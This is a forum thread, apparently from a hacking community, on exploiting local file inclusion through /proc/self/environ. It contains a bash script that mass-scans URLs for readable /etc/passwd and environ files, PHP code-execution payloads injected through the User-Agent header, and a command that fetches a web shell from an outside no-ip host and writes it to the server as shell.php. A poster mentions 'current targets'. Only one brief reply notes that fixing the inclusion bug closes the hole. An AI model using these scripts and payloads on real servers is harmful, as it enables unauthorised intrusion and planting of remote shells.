EvilZone
Hacking and Security => Hacking and Security => : neusbeer January 27, 2012, 09:19:35 AM
-
There's a 'new' lfi attack being used a lot at this moment.
read this article http://www.devilscafe.in/2012/01/lfi-and-shell-upload-with-tamper-data.html (http://www.devilscafe.in/2012/01/lfi-and-shell-upload-with-tamper-data.html)
in's a lfi with standard /etc/passwd inclusion, and right after that a check
for /proc/self/eviron
I never heard of this 'link'.. what is it? I know it's from linux.. is it the
running account info on the server?
anyways it allows the use of a shell ;-)
I made a script to check the exploit on a url list.
input a list with /etc/passwd in the url (example list (http://dl.dropbox.com/u/4378489/Forums/evilzone/links1.txt))
and results in a logfile with /proc/self/eviron possible.
(after that tampering user-agent to get your shell up there :-))
#!/bin/bash
cat "$1" | while read url ; do
test=$(curl "$url" | grep -i "root")
if [ -z "$test" ]; then
echo "No LFI in $url"
else
echo "LFI found in $url"
echo "$url" >> output.log
fi
done
cat output.log | sed 's/\/etc\/passwd/\/proc\/self\/environ/g' | while read url1 ; do
test=$(curl "$url1" | grep -i "document_root")
if [ -z "$test" ]; then
echo "No /proc/self/environ in $url1"
else
echo "/proc/self/environ found in $url1"
echo "$url1" >> final_list.log
fi
done
-
saw this the other day, very interesting!
Ive been using TamperData for years now, brilliant tool
-
I don't.. I use mostly Fillder2 (gives me mostly the same results)..
Testing now that tamperdata script from firefox..
looks handy..
-
/proc/self/environ contains environment variables for curren process.
In apache (idk if in another servers works too) it contains several fields of information, being one of them the User-agent of the client. If you can include /proc/self/environ and you set your user-agent to something like "<?php passthru($_GET['s']); ?>" that PHP code will be executed.
-
yes.. that's the idea! :D
only I'm struggling with the codes.. :P
in that way as you describe I get an error about wrong char use in the T_STRING
the ' won't work... at least at my current targets..
so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
willl return and error that the ' isn't accepted.
when I try with passtru,
<? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
I get an error that I'm not giving a url.
(think spaces in url?)
-
yes.. that's the idea! :D
only I'm struggling with the codes.. :P
in that way as you describe I get an error about wrong char use in the T_STRING
the ' won't work... at least at my current targets..
so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt (http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt) -O shell.php');?>
willl return and error that the ' isn't accepted.
when I try with passtru,
<? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt (http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt) -O shell.php
I get an error that I'm not giving a url.
(think spaces in url?)
I always use <?php ?>, might be the problem. Dunno.
Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.
-
Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI + log poisoning).
-
Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI + log poisoning).
It is the same concept. You "poison" the logs with an user-agent containing PHP code and then execute it with a LFI. But you need read rights to those logs.
-
log poisioning is something different..
hmm and I still can't get the damn thing to work :P
-
I always use <?php ?>, might be the problem. Dunno.
Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.
(sorry double post, but just saw this post)
maybe old.. but I just found out.. ;)
and why isn't it fixed by now ?
I often check spiderlabs blog for new (or in this case old) exploits/hack tries on their honeypots and servers etc.. and some other contributers on this.
often gives me a lot of new info what is being exploited at this moment, and
even the requests etc.
ow and php quote has to end with ?> .. always?
-
(sorry double post, but just saw this post)
maybe old.. but I just found out.. ;)
and why isn't it fixed by now ?
I often check spiderlabs blog for new (or in this case old) exploits/hack tries on their honeypots and servers etc.. and some other contributers on this.
often gives me a lot of new info what is being exploited at this moment, and
even the requests etc.
The /proc/self/environ is not an exploit or bug in itself. It is still just a LFI problem. Therefore it is not fixed. Fix the LFI vuln and you fix the /proc/self/environ problem.
ow and php quote has to end with ?> .. always?
PHP tags are always <?php /* do shit here */ ?> or <? /* Do shit here */ ?> depending on version and usage etc.
-
ok... I've got the wrong examples then.. (about ending with ?>)
ty..